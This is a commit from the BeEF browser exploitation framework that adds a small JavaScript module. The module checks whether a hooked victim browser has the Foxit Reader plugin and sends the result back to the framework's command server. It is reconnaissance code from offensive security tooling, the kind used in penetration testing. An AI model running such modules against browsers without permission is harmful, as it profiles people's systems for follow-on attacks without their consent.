Detection added for the Foxit Reader plugin, fixes #829

This commit is contained in:
Javier Marcos
2013-03-11 00:19:19 +00:00
parent 2d710a1bcf
commit 657aac9dcd
9 changed files with 100 additions and 3 deletions

View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
});